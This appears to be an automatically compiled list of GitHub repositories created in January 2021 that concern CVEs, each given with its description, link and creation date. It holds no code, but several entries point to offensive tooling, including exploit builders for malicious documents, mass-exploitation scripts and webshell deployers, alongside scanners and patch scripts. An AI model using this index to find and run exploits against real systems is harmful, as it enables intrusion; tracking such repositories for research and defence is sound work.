**Dockerfile to build cve-2013-2028 container with centos6 and nginx** : [mambroziak/docker-cve-2013-2028](https://github.com/mambroziak/docker-cve-2013-2028) create time: 2021-02-02T03:45:05Z

**PoC for CVE-2016-1000027** : [artem-smotrakov/cve-2016-1000027-poc](https://github.com/artem-smotrakov/cve-2016-1000027-poc) create time: 2021-02-01T19:46:51Z

**no description** : [SantiagoSerrao/ScannerCVE-2021-3156](https://github.com/SantiagoSerrao/ScannerCVE-2021-3156) create time: 2021-02-01T18:46:34Z

**no description** : [abdallah-elsharif/cve-2019-3396](https://github.com/abdallah-elsharif/cve-2019-3396) create time: 2021-02-01T16:10:27Z

**This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user** : [jopraveen/CVE-2020-7247](https://github.com/jopraveen/CVE-2020-7247) create time: 2021-02-01T13:01:21Z

**Exploit of CVE-2019-8942 and CVE-2019-8943** : [v0lck3r/CVE-2019-8943](https://github.com/v0lck3r/CVE-2019-8943) create time: 2021-02-01T12:47:28Z

**Patch Script for CVE-2021-3156 Heap Overflow** : [Ashish-dawani/CVE-2021-3156-Patch](https://github.com/Ashish-dawani/CVE-2021-3156-Patch) create time: 2021-02-01T10:35:03Z

**Modified version of auxiliary/admin/http/tomcat_ghostcat, it can Read any file** : [YU5Z8X2CvH1fv4ep/CVE-2020-1938-MSF-MODULE](https://github.com/YU5Z8X2CvH1fv4ep/CVE-2020-1938-MSF-MODULE) create time: 2021-02-01T01:59:17Z

**a simple script to patch CVE-2021-3156 (heap based buffer overflow via sudo).** : [voidlsd/CVE-2021-3156](https://github.com/voidlsd/CVE-2021-3156) create time: 2021-02-01T00:41:55Z

**A docker environment to research CVE-2021-3156** : [apogiatzis/docker-CVE-2021-3156](https://github.com/apogiatzis/docker-CVE-2021-3156) create time: 2021-01-31T22:58:13Z

**no description** : [kal1gh0st/CVE-2021-3156](https://github.com/kal1gh0st/CVE-2021-3156) create time: 2021-01-31T16:10:11Z

**POC exploit of CVE-2021-3345, a vulnerability in libgcrypt version 1.9.0** : [MLGRadish/CVE-2021-3345](https://github.com/MLGRadish/CVE-2021-3345) create time: 2021-01-31T09:28:14Z

**复现别人家的CVEs系列** : [Q4n/CVE-2021-3156](https://github.com/Q4n/CVE-2021-3156) create time: 2021-01-31T07:01:50Z

**no description** : [teamtopkarl/CVE-2021-3156](https://github.com/teamtopkarl/CVE-2021-3156) create time: 2021-01-31T03:38:37Z

**CVE-2021-3378 | FortiLogger - Unauthenticated Arbitrary File Upload (Metasploit)** : [erberkan/fortilogger_arbitrary_fileupload](https://github.com/erberkan/fortilogger_arbitrary_fileupload) create time: 2021-01-30T23:47:14Z

**no description** : [blasty/CVE-2021-3156](https://github.com/blasty/CVE-2021-3156) create time: 2021-01-30T20:39:58Z

**PoC for cve-2015-5347** : [alexanderkjall/wicker-cve-2015-5347](https://github.com/alexanderkjall/wicker-cve-2015-5347) create time: 2021-01-30T16:11:29Z

**checking CVE-2021-3156 vulnerability & patch script** : [nobodyatall648/CVE-2021-3156](https://github.com/nobodyatall648/CVE-2021-3156) create time: 2021-01-30T10:53:26Z

**no description** : [w0lfzhang/sonicwall-cve-2019-7482](https://github.com/w0lfzhang/sonicwall-cve-2019-7482) create time: 2021-01-30T09:50:47Z

**PoC for CVE-2021-3156 (sudo heap overflow)** : [stong/CVE-2021-3156](https://github.com/stong/CVE-2021-3156) create time: 2021-01-30T03:22:04Z

**Notes regarding CVE-2021-3156: Heap-Based Buffer Overflow in Sudo** : [mbcrump/CVE-2021-3156](https://github.com/mbcrump/CVE-2021-3156) create time: 2021-01-29T19:24:41Z

**A (wanted to be) better script than what can be found on exploit-db about the authenticated arbitrary read file on GitLab v12.9.0 (CVE-2020-10977)** : [erk3/gitlab-12.9.0-file-read](https://github.com/erk3/gitlab-12.9.0-file-read) create time: 2021-01-29T16:17:10Z

**This python file will decrypt the configurationFile used by hikvision cameras vulnerable to CVE-2017-7921.** : [chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) create time: 2021-01-29T16:08:35Z

**no description** : [pwn3z/CVE-2020-14882-WebLogic](https://github.com/pwn3z/CVE-2020-14882-WebLogic) create time: 2021-01-29T13:12:40Z

**no description** : [ltfafei/CVE-2021-3156](https://github.com/ltfafei/CVE-2021-3156) create time: 2021-01-29T11:32:33Z

**no description** : [binw2018/CVE-2021-3156-SCRIPT](https://github.com/binw2018/CVE-2021-3156-SCRIPT) create time: 2021-01-29T03:34:31Z

**Tester for a vulnerability CVE-2020-15227 found in nette/application and nette/nette** : [VottusCode/cve-2020-15227](https://github.com/VottusCode/cve-2020-15227) create time: 2021-01-28T10:50:52Z

**CVE-2021-3156** : [ph4ntonn/CVE-2021-3156](https://github.com/ph4ntonn/CVE-2021-3156) create time: 2021-01-28T09:52:55Z

**👻CVE-2017-16995** : [ph4ntonn/CVE-2017-16995](https://github.com/ph4ntonn/CVE-2017-16995) create time: 2021-01-28T09:32:04Z

**no description** : [baka9moe/CVE-2021-3156-Exp](https://github.com/baka9moe/CVE-2021-3156-Exp) create time: 2021-01-28T08:55:04Z

**sudo安全漏洞检测脚本,用来检查您的系统当前是否存在相关的安全漏洞。** : [gh-Devin/sudo-cve-2021](https://github.com/gh-Devin/sudo-cve-2021) create time: 2021-01-28T06:22:38Z

**脚本小子竟是我自己?** : [H4ckForJob/cve-2021-3156](https://github.com/H4ckForJob/cve-2021-3156) create time: 2021-01-28T02:29:37Z

**cve-2021-3156;sudo堆溢出漏洞;漏洞检测** : [yaunsky/cve-2021-3156](https://github.com/yaunsky/cve-2021-3156) create time: 2021-01-28T02:20:24Z

**1day research effort** : [kernelzeroday/CVE-2021-3156-Baron-Samedit](https://github.com/kernelzeroday/CVE-2021-3156-Baron-Samedit) create time: 2021-01-28T02:13:49Z

**This simple bash script will patch the recently discovered sudo heap overflow vulnerability.** : [elbee-cyber/CVE-2021-3156-PATCHER](https://github.com/elbee-cyber/CVE-2021-3156-PATCHER) create time: 2021-01-27T21:49:06Z

**CVE-2021-3156** : [ymrsmns/CVE-2021-3156](https://github.com/ymrsmns/CVE-2021-3156) create time: 2021-01-27T20:57:00Z

**no description** : [jokerTPR2004/CVE-2021-3156](https://github.com/jokerTPR2004/CVE-2021-3156) create time: 2021-01-27T16:35:43Z

**CVE-2021-3156** : [reverse-ex/CVE-2021-3156](https://github.com/reverse-ex/CVE-2021-3156) create time: 2021-01-27T16:03:34Z

**no description** : [nexcess/sudo_cve-2021-3156](https://github.com/nexcess/sudo_cve-2021-3156) create time: 2021-01-27T14:40:57Z

**Exploit for CVE-2021-3129** : [nth347/CVE-2021-3129_exploit](https://github.com/nth347/CVE-2021-3129_exploit) create time: 2021-01-27T10:16:35Z

**CVE-2020-14882部署冰蝎内存马** : [ShmilySec/CVE-2020-14882](https://github.com/ShmilySec/CVE-2020-14882) create time: 2021-01-27T06:29:52Z

**no description** : [crisprss/Laravel_CVE-2021-3129_EXP](https://github.com/crisprss/Laravel_CVE-2021-3129_EXP) create time: 2021-01-27T05:44:52Z

**WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar** : [Y4er/CVE-2020-14756](https://github.com/Y4er/CVE-2020-14756) create time: 2021-01-27T01:24:52Z

**CVE-2014-3551** : [JavaGarcia/CVE-2014-3551](https://github.com/JavaGarcia/CVE-2014-3551) create time: 2021-01-27T01:02:49Z

**no description** : [AssassinUKG/CVE-2020-9484](https://github.com/AssassinUKG/CVE-2020-9484) create time: 2021-01-26T22:51:30Z

**no description** : [mr-r3b00t/CVE-2021-3156](https://github.com/mr-r3b00t/CVE-2021-3156) create time: 2021-01-26T19:53:04Z

**no description** : [dpredrag/CVE-2020-8840](https://github.com/dpredrag/CVE-2020-8840) create time: 2021-01-26T19:10:22Z

**Disclosure of Accfly camera vulnerabilities: CVE-2020-25782, CVE-2020-25783, CVE-2020-25784, CVE-2020-25785.** : [tezeb/accfly](https://github.com/tezeb/accfly) create time: 2021-01-26T15:48:27Z

**用于对WebLogic(10.3.6.0.0 ;12.1.3.0.0 ;12.2.1.3.0; 12.2.1.4.0 ;14.1.1.0.0)进行验证及利用** : [fan1029/CVE-2020-14883EXP](https://github.com/fan1029/CVE-2020-14883EXP) create time: 2021-01-25T15:33:04Z

**Pyrescom Termod proof-of-concept code for CVE-2020-23160, CVE-2020-23161 and CVE-2020-23162** : [Outpost24/Pyrescom-Termod-PoC](https://github.com/Outpost24/Pyrescom-Termod-PoC) create time: 2021-01-25T14:17:35Z

**SignHere is implementation of CVE-2017-11882. SignHere is builder of malicious rtf document and VBScript payloads.** : [Retr0-code/SignHere](https://github.com/Retr0-code/SignHere) create time: 2021-01-25T12:44:03Z

**Denial of Service (DoS) - jQuery UI 1.12.1 - Exploit** : [rafaelcintralopes/CVE-2020-28488](https://github.com/rafaelcintralopes/CVE-2020-28488) create time: 2021-01-25T12:39:14Z

**Quick and dirty bruteforcer for CVE-2018-7669 (Directory Traversal Vulnerability in Sitecore)** : [palaziv/CVE-2018-7669](https://github.com/palaziv/CVE-2018-7669) create time: 2021-01-25T10:13:32Z

**no description** : [SecPros-Team/laravel-CVE-2021-3129-EXP](https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP) create time: 2021-01-25T08:42:28Z

**CVE-2020-8597 in RM2100** : [lakwsh/CVE-2020-8597](https://github.com/lakwsh/CVE-2020-8597) create time: 2021-01-24T15:28:00Z

**no description** : [killmonday/CVE-2020-17530-s2-061](https://github.com/killmonday/CVE-2020-17530-s2-061) create time: 2021-01-24T07:51:31Z

**DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)** : [knqyf263/dnspooq](https://github.com/knqyf263/dnspooq) create time: 2021-01-23T19:07:18Z

**GitLab 12.9 Arbitrary File Read** : [VoxelNaut/cve-2020-10977](https://github.com/VoxelNaut/cve-2020-10977) create time: 2021-01-23T18:21:27Z

**CVE-2020-26217 && XStream RCE** : [Al1ex/CVE-2020-26217](https://github.com/Al1ex/CVE-2020-26217) create time: 2021-01-22T09:56:11Z

**CVE-2020-26259 &&XStream Arbitrary File Delete** : [Al1ex/CVE-2020-26259](https://github.com/Al1ex/CVE-2020-26259) create time: 2021-01-22T09:23:28Z

**CVE-2020-26258 && XStream SSRF** : [Al1ex/CVE-2020-26258](https://github.com/Al1ex/CVE-2020-26258) create time: 2021-01-22T08:44:24Z

**no description** : [rabbitsafe/CVE-2021-2109](https://github.com/rabbitsafe/CVE-2021-2109) create time: 2021-01-22T07:43:46Z

**Apache Kylin API Unauthorized Access** : [Al1ex/CVE-2020-13937](https://github.com/Al1ex/CVE-2020-13937) create time: 2021-01-22T06:53:34Z

**CVE-2021-2109 && Weblogic Server RCE via JNDI** : [Al1ex/CVE-2021-2109](https://github.com/Al1ex/CVE-2021-2109) create time: 2021-01-22T05:37:11Z

**Laravel debug rce** : [SNCKER/CVE-2021-3129](https://github.com/SNCKER/CVE-2021-3129) create time: 2021-01-22T05:12:21Z

**no description** : [zeromirror/cve_2020-11060](https://github.com/zeromirror/cve_2020-11060) create time: 2021-01-22T04:07:47Z

**no description** : [Dviejopomata/CVE-2020-8554](https://github.com/Dviejopomata/CVE-2020-8554) create time: 2021-01-21T22:41:50Z

**Heap Corruption** : [farif/cve_2019-5827](https://github.com/farif/cve_2019-5827) create time: 2021-01-21T18:54:10Z

**CVE-2020-28874** : [varandinawer/CVE-2020-28874](https://github.com/varandinawer/CVE-2020-28874) create time: 2021-01-21T13:11:30Z

**no description** : [jet-pentest/CVE-2020-24032](https://github.com/jet-pentest/CVE-2020-24032) create time: 2021-01-21T08:07:09Z

**no description** : [jet-pentest/CVE-2021-3130](https://github.com/jet-pentest/CVE-2021-3130) create time: 2021-01-21T08:04:32Z

**CVE-2020-35713** : [Al1ex/CVE-2020-35713](https://github.com/Al1ex/CVE-2020-35713) create time: 2021-01-21T06:39:58Z

**CVE-2020-17456 & Seowon SLC 130 Router RCE** : [Al1ex/CVE-2020-17456](https://github.com/Al1ex/CVE-2020-17456) create time: 2021-01-21T06:16:40Z

**Zerologon Check and Exploit - Discovered by Tom Tervoort of Secura and expanded on @Dirkjanm's cve-2020-1472 coded example** : [sho-luv/zerologon](https://github.com/sho-luv/zerologon) create time: 2021-01-20T21:38:47Z

**Added Vulnerability Code in Python for Nginx Vulnerability (CVE-2017-7529)** : [fardeen-ahmed/Remote-Integer-Overflow-Vulnerability](https://github.com/fardeen-ahmed/Remote-Integer-Overflow-Vulnerability) create time: 2021-01-20T15:24:10Z

**no description** : [Eremiel/CVE-2019-5420](https://github.com/Eremiel/CVE-2019-5420) create time: 2021-01-20T15:06:58Z

**no description** : [dmlgzs/cve-2021-1647](https://github.com/dmlgzs/cve-2021-1647) create time: 2021-01-20T10:05:00Z

**CVE-2019-17137 POC** : [vncloudsco/CVE-2019-17137](https://github.com/vncloudsco/CVE-2019-17137) create time: 2021-01-20T06:52:20Z

**Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file. The application is written primarily with PHP so we use PHP in our PoC** : [rmccarth/cve-2021-3164](https://github.com/rmccarth/cve-2021-3164) create time: 2021-01-20T02:48:46Z

**CVE-2017-7529 | nginx on the range 0.5.6 - 1.13.2** : [ninjabuster/exploit-nginx-1.10.3](https://github.com/ninjabuster/exploit-nginx-1.10.3) create time: 2021-01-19T07:12:10Z

**no description** : [go-bi/CVE-2019-0708-EXP-Windows](https://github.com/go-bi/CVE-2019-0708-EXP-Windows) create time: 2021-01-19T05:19:18Z

**CENG 325 - Principles of Information Security And Privacy** : [canumay/cve-2018-1335](https://github.com/canumay/cve-2018-1335) create time: 2021-01-18T19:01:50Z

**CVE-2020-17519; Apache Flink 任意文件读取; 批量检测** : [yaunsky/CVE-2020-17519-Apache-Flink](https://github.com/yaunsky/CVE-2020-17519-Apache-Flink) create time: 2021-01-18T02:03:05Z

**PoC for CVE-2019-8791 & CVE-2019-8792** : [ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792](https://github.com/ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792) create time: 2021-01-17T18:49:54Z

**no description** : [trikhanhhk/EXPLOIT_CVE_2019_11580](https://github.com/trikhanhhk/EXPLOIT_CVE_2019_11580) create time: 2021-01-17T14:43:54Z

**Exploit CVE 2019 11580** : [trikhanhhk/CVE_2019_11580](https://github.com/trikhanhhk/CVE_2019_11580) create time: 2021-01-17T14:35:51Z

**no description** : [okanulkr/CurveBall-CVE-2020-0601-PoC](https://github.com/okanulkr/CurveBall-CVE-2020-0601-PoC) create time: 2021-01-17T11:53:28Z

**Rust implementation of CVE-2018-16763 with some extra features.** : [uwueviee/Fu3l-F1lt3r](https://github.com/uwueviee/Fu3l-F1lt3r) create time: 2021-01-15T20:09:09Z

**Apache Tomcat RCE (CVE-2020-9484)** : [X-x-X-0/-CVE-2020-9484](https://github.com/X-x-X-0/-CVE-2020-9484) create time: 2021-01-15T17:59:50Z

**Apache Tomcat RCE (CVE-2020-9484)** : [X-x-X-0/-CVE-2020-9484-](https://github.com/X-x-X-0/-CVE-2020-9484-) create time: 2021-01-15T17:59:25Z

**no description** : [ubrito/poc_CVE-2016-6210](https://github.com/ubrito/poc_CVE-2016-6210) create time: 2021-01-15T16:05:09Z

**CVE-2020-14882** : [securitysqs/poc](https://github.com/securitysqs/poc) create time: 2021-01-15T09:44:35Z

**Apache Kylin API未授权访问漏洞;CVE-2020-13937;Apache Kylin漏洞** : [yaunsky/CVE-2020-13937](https://github.com/yaunsky/CVE-2020-13937) create time: 2021-01-15T08:57:09Z

**PoC for CVE-2020-8165** : [progfay/CVE-2020-8165](https://github.com/progfay/CVE-2020-8165) create time: 2021-01-15T07:31:21Z

**no description** : [1nteger-c/CVE-2019-8605](https://github.com/1nteger-c/CVE-2019-8605) create time: 2021-01-15T06:12:14Z

**SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 Directory Indexing Vulnerability** : [swzhouu/CVE-2020-27368](https://github.com/swzhouu/CVE-2020-27368) create time: 2021-01-15T05:08:13Z

**no description** : [AssassinUKG/CVE-2020-8165](https://github.com/AssassinUKG/CVE-2020-8165) create time: 2021-01-15T04:40:24Z

**no description** : [justinsteven/sudo_digest_toctou_poc_CVE-2015-8239](https://github.com/justinsteven/sudo_digest_toctou_poc_CVE-2015-8239) create time: 2021-01-15T03:14:02Z

**CVE-2020-7200: HPE Systems Insight Manager (SIM) RCE PoC** : [alexfrancow/CVE-2020-7200](https://github.com/alexfrancow/CVE-2020-7200) create time: 2021-01-14T21:05:29Z

**Exploit script for CVE-2020-7961** : [ShutdownRepo/CVE-2020-7961](https://github.com/ShutdownRepo/CVE-2020-7961) create time: 2021-01-14T19:18:13Z

**PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)** : [chipik/SAP_EEM_CVE-2020-6207](https://github.com/chipik/SAP_EEM_CVE-2020-6207) create time: 2021-01-14T10:49:40Z

**CVE-2020-17519 EXP** : [radbsie/CVE-2020-17519-Exp](https://github.com/radbsie/CVE-2020-17519-Exp) create time: 2021-01-14T10:45:29Z

**SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 Cross Site Scripting (XSS) Vulnerability** : [swzhouu/CVE-2020-26733](https://github.com/swzhouu/CVE-2020-26733) create time: 2021-01-14T10:03:14Z

**Skyworth GN542VF Boa version 0.94.13 does not set the Secure flag for the session cookie in an HTTPS session** : [swzhouu/CVE-2020-26732](https://github.com/swzhouu/CVE-2020-26732) create time: 2021-01-14T09:55:59Z

**PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.** : [z3ox1s/PHPUnit-CVE-2017-9841](https://github.com/z3ox1s/PHPUnit-CVE-2017-9841) create time: 2021-01-14T09:40:41Z

**exp for CVE-2019-0887** : [t43Wiu6/CVE-2019-0887](https://github.com/t43Wiu6/CVE-2019-0887) create time: 2021-01-14T07:49:51Z

**lanproxy 目录遍历漏洞批量检测用户名密码POC (CVE-2021-3019)** : [liuxu54898/CVE-2021-3019](https://github.com/liuxu54898/CVE-2021-3019) create time: 2021-01-14T07:19:21Z

**Silent DOC Exploit CVE-2019 Source Builder** : [exploiterkid33/Doc-Exploit-Builder-2021](https://github.com/exploiterkid33/Doc-Exploit-Builder-2021) create time: 2021-01-14T02:02:25Z

**Silent DOC Exploit CVE-2019 Source Builder** : [exploiterkid33/Silent-DOC-Exploit-CVE-2019-Source-Builder](https://github.com/exploiterkid33/Silent-DOC-Exploit-CVE-2019-Source-Builder) create time: 2021-01-14T01:52:56Z

**Free Best Exploit** : [exploiterkid33/Exploit-Builder-2021-Cve2019](https://github.com/exploiterkid33/Exploit-Builder-2021-Cve2019) create time: 2021-01-14T01:51:07Z

**no description** : [Starry-lord/CVE-2018-0114](https://github.com/Starry-lord/CVE-2018-0114) create time: 2021-01-13T17:40:08Z

**Exploit for CVE-2021-3129** : [ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits) create time: 2021-01-13T12:52:20Z

**CVE-2021-3131** : [jet-pentest/CVE-2021-3131](https://github.com/jet-pentest/CVE-2021-3131) create time: 2021-01-13T07:41:25Z

**CVE-2019-9193 English Rewrite** : [X-x-X-0/CVE-2019-9193](https://github.com/X-x-X-0/CVE-2019-9193) create time: 2021-01-12T19:00:25Z

**CVE-2017-12615 任意文件写入exp,写入webshell** : [gardenWhy/CVE-2017-12615-EXP](https://github.com/gardenWhy/CVE-2017-12615-EXP) create time: 2021-01-12T09:07:12Z

**CVE-2017-16894** : [ahacker15/CVE-2017-16894](https://github.com/ahacker15/CVE-2017-16894) create time: 2021-01-12T05:11:14Z

**no description** : [AnasTaoutaou/CVE-2019-5420](https://github.com/AnasTaoutaou/CVE-2019-5420) create time: 2021-01-11T19:23:01Z

**Apache Unomi CVE-2020-13942: RCE Vulnerabilities** : [hoanx4/apche_unomi_rce](https://github.com/hoanx4/apche_unomi_rce) create time: 2021-01-11T15:50:27Z

**CVE-2020-36188 &&Jackson-databind RCE** : [Al1ex/CVE-2020-36188](https://github.com/Al1ex/CVE-2020-36188) create time: 2021-01-11T06:29:38Z

**CVE-2020-36184 && Jackson-databind RCE** : [Al1ex/CVE-2020-36184](https://github.com/Al1ex/CVE-2020-36184) create time: 2021-01-11T06:22:25Z

**local exploit** : [ORCA666/CVE-2020-0796](https://github.com/ORCA666/CVE-2020-0796) create time: 2021-01-11T04:48:26Z

**CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞探测POC** : [FanqXu/CVE-2021-3019](https://github.com/FanqXu/CVE-2021-3019) create time: 2021-01-11T04:18:44Z

**no description** : [purgedemo/CVE-2018-6574_2](https://github.com/purgedemo/CVE-2018-6574_2) create time: 2021-01-11T02:16:19Z

**no description** : [purgedemo/CVE-2018-6574](https://github.com/purgedemo/CVE-2018-6574) create time: 2021-01-11T01:55:54Z

**利用Apache Flink CVE-2020-17518 getshell** : [rakjong/Flink-CVE-2020-17518-getshell](https://github.com/rakjong/Flink-CVE-2020-17518-getshell) create time: 2021-01-10T15:06:40Z

**Spring 安全漏洞 CVE-2020-5421复现** : [pandaMingx/CVE-2020-5421](https://github.com/pandaMingx/CVE-2020-5421) create time: 2021-01-10T12:26:00Z

**CVE-2019-18655 Metasploit Module** : [0xhuesca/CVE-2019-18655](https://github.com/0xhuesca/CVE-2019-18655) create time: 2021-01-10T10:45:49Z

**CVE-2020-36179~82 Jackson-databind SSRF&RCE** : [Al1ex/CVE-2020-36179](https://github.com/Al1ex/CVE-2020-36179) create time: 2021-01-10T06:47:49Z

**[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read** : [murataydemir/CVE-2020-17519](https://github.com/murataydemir/CVE-2020-17519) create time: 2021-01-10T01:24:50Z

**[CVE-2020-17518] Apache Flink RESTful API Arbitrary File Upload via Directory Traversal** : [murataydemir/CVE-2020-17518](https://github.com/murataydemir/CVE-2020-17518) create time: 2021-01-10T01:12:45Z

**no description** : [ElmouradiAmine/CVE-2020-7048](https://github.com/ElmouradiAmine/CVE-2020-7048) create time: 2021-01-09T13:52:09Z

**lanproxy 目录遍历漏洞批量检测 (CVE-2021-3019)** : [B1anda0/CVE-2021-3019](https://github.com/B1anda0/CVE-2021-3019) create time: 2021-01-09T07:11:38Z

**CVE-2020-14179 Scanner** : [c0brabaghdad1/CVE-2020-14179](https://github.com/c0brabaghdad1/CVE-2020-14179) create time: 2021-01-08T14:15:24Z

**PoC for CVE-2021-1056, related to GPU Container Security** : [pokerfaceSad/CVE-2021-1056](https://github.com/pokerfaceSad/CVE-2021-1056) create time: 2021-01-08T11:29:48Z

**2020l4web-campaign-DanCvejn created by GitHub Classroom** : [pslib-cz/2020l4web-campaign-DanCvejn](https://github.com/pslib-cz/2020l4web-campaign-DanCvejn) create time: 2021-01-08T08:03:47Z

**CVE-2020-17519** : [hoanx4/CVE-2020-17519](https://github.com/hoanx4/CVE-2020-17519) create time: 2021-01-08T06:50:59Z

**quick'n'dirty automated checks for potential exploitation of CVE-2020-1472 (aka ZeroLogon), using leading artifects in determining an actual exploitation of CVE-2020-1472. requires admin access to the DCs** : [YossiSassi/ZeroLogon-Exploitation-Check](https://github.com/YossiSassi/ZeroLogon-Exploitation-Check) create time: 2021-01-07T21:35:16Z

**no description** : [uzzzval/CVE-2020-17530](https://github.com/uzzzval/CVE-2020-17530) create time: 2021-01-07T14:24:08Z

**Remote Code Execution vulnerability on ArcSight Logger** : [ch1nghz/CVE-2020-11851](https://github.com/ch1nghz/CVE-2020-11851) create time: 2021-01-07T12:30:23Z

**An updated version of save-pixels that patches the CVE-2020-8175 security issue.** : [sysollie/save-pixels-updated](https://github.com/sysollie/save-pixels-updated) create time: 2021-01-07T10:41:09Z

**An updated version of get-pixels that patches the CVE-2020-8175 security issue.** : [sysollie/get-pixels-updated](https://github.com/sysollie/get-pixels-updated) create time: 2021-01-07T09:31:26Z

**POC to run system component in an untrusted-app process** : [Zachinio/CVE-2020-0001](https://github.com/Zachinio/CVE-2020-0001) create time: 2021-01-06T18:51:19Z

**Apache Flink Directory Traversal (CVE-2020-17519) Nmap NSE Script** : [dolevf/apache-flink-directory-traversal.nse](https://github.com/dolevf/apache-flink-directory-traversal.nse) create time: 2021-01-06T16:03:06Z

**no description** : [QmF0c3UK/CVE-2020-17519](https://github.com/QmF0c3UK/CVE-2020-17519) create time: 2021-01-06T13:41:24Z

**no description** : [QmF0c3UK/CVE-2020-17518](https://github.com/QmF0c3UK/CVE-2020-17518) create time: 2021-01-06T13:40:06Z

**CVE-2020-1937** : [shanika04/apache_kylin](https://github.com/shanika04/apache_kylin) create time: 2021-01-06T13:31:20Z

**CVE-2020-9483 OR CVE-2020-13921** : [shanika04/apache_skywalking](https://github.com/shanika04/apache_skywalking) create time: 2021-01-06T13:22:32Z

**CVE-2019-14900** : [shanika04/hibernate-orm](https://github.com/shanika04/hibernate-orm) create time: 2021-01-06T13:06:45Z

**CVE-2016-4999** : [shanika04/dashbuilder](https://github.com/shanika04/dashbuilder) create time: 2021-01-06T13:02:50Z

**CVE-2016-4468** : [shanika04/cloudfoundry_uaa](https://github.com/shanika04/cloudfoundry_uaa) create time: 2021-01-06T12:34:36Z

**Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)** : [B1anda0/CVE-2020-17519](https://github.com/B1anda0/CVE-2020-17519) create time: 2021-01-06T02:15:39Z

**Python implementation of Roundcube LFI (CVE-2017-16651)** : [stonepresto/CVE-2017-16651](https://github.com/stonepresto/CVE-2017-16651) create time: 2021-01-06T01:46:39Z

**Cross Site Scripting (XSS) in Digisol DG-HR3400 Router** : [the-girl-who-lived/CVE-2020-35262](https://github.com/the-girl-who-lived/CVE-2020-35262) create time: 2021-01-05T19:32:31Z

**no description** : [dsp-testing/CVE-2018-13797](https://github.com/dsp-testing/CVE-2018-13797) create time: 2021-01-05T18:56:56Z

**Stored XSS via CSRF in Beetel 777VR1 Router** : [the-girl-who-lived/CVE-2020-25498](https://github.com/the-girl-who-lived/CVE-2020-25498) create time: 2021-01-05T17:38:52Z

**no description** : [dsp-testing/CVE-2018-16492](https://github.com/dsp-testing/CVE-2018-16492) create time: 2021-01-05T14:44:09Z

**CISCO CVE-2020-3452 Scanner & Exploiter** : [darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter) create time: 2021-01-05T14:41:13Z

**SolarWinds Orion API 远程代码执行漏洞批量检测脚本** : [B1anda0/CVE-2020-10148](https://github.com/B1anda0/CVE-2020-10148) create time: 2021-01-05T13:42:36Z

**no description** : [AndyFeiLi/CVE-2014-4688](https://github.com/AndyFeiLi/CVE-2014-4688) create time: 2021-01-05T10:02:37Z

**no description** : [dennyson120/CVE-2020-27955](https://github.com/dennyson120/CVE-2020-27955) create time: 2021-01-05T08:13:13Z

**PoC of HTTP Request Smuggling in nodejs (CVE-2020-8287)** : [progfay/nodejs-http-transfer-encoding-smuggling-poc](https://github.com/progfay/nodejs-http-transfer-encoding-smuggling-poc) create time: 2021-01-05T02:09:23Z

**no description** : [kurenaif/CVE-2020-28052_PoC](https://github.com/kurenaif/CVE-2020-28052_PoC) create time: 2021-01-04T17:13:39Z

**Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys** : [MrTiz9/CVE-2020-0688](https://github.com/MrTiz9/CVE-2020-0688) create time: 2021-01-04T10:48:40Z

**Scanner for Zyxel products which are potentially vulnerable due to an undocumented user account (CVE-2020-29583)** : [2d4d/scan_CVE-2020-29583](https://github.com/2d4d/scan_CVE-2020-29583) create time: 2021-01-04T00:56:55Z

**no description** : [hybryx/CVE-2020-8165](https://github.com/hybryx/CVE-2020-8165) create time: 2021-01-03T21:59:09Z

**python2.7 script for JWT generation** : [Eremiel/CVE-2018-0114](https://github.com/Eremiel/CVE-2018-0114) create time: 2021-01-03T21:12:10Z

**2020一些漏洞** : [r0eXpeR/CVE-2020](https://github.com/r0eXpeR/CVE-2020) create time: 2021-01-03T13:04:52Z

**no description** : [AzhariKun/CVE-2018-15133](https://github.com/AzhariKun/CVE-2018-15133) create time: 2021-01-03T08:06:46Z

**no description** : [Udyz/CVE-2020-10148-Solarwinds-Orion](https://github.com/Udyz/CVE-2020-10148-Solarwinds-Orion) create time: 2021-01-03T05:35:07Z

**CVE-2020–7961 Mass exploit for Script Kiddies** : [Udyz/CVE-2020-7961-Mass](https://github.com/Udyz/CVE-2020-7961-Mass) create time: 2021-01-02T13:57:59Z

**no description** : [AndyFeiLi/CVE-2018-9276](https://github.com/AndyFeiLi/CVE-2018-9276) create time: 2021-01-02T09:08:42Z

